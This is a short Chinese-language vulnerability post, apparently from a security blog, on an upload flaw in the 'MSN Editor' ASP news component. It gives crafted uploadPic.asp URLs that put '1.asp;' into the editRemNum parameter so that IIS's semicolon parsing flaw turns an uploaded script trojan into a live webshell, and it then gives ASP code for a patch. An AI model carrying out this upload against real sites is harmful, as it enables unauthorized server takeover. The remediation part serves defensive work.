MSN Editor 0DAY

简单说下利用的方法吧。
点击图片上传后会出现上传页面,地址为
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的图片上传后,地址为
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明显。图片的地址是根据RemNum后面的编号生成的。
利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012
变成下面这个地址
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在浏览器里打开
然后选择你的脚本木马上传
将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif
然后直接打开就是我们的小马地址!
[红科网安]漏洞修补建议:
关键代码:
             if editRemNum<>"" then                
                remNum = editRemNum
             else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"
          end if
 
去掉自定义部分,只留下随机参数即可。
保留代码:
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"

你可能感兴趣的:(职场,休闲,0day)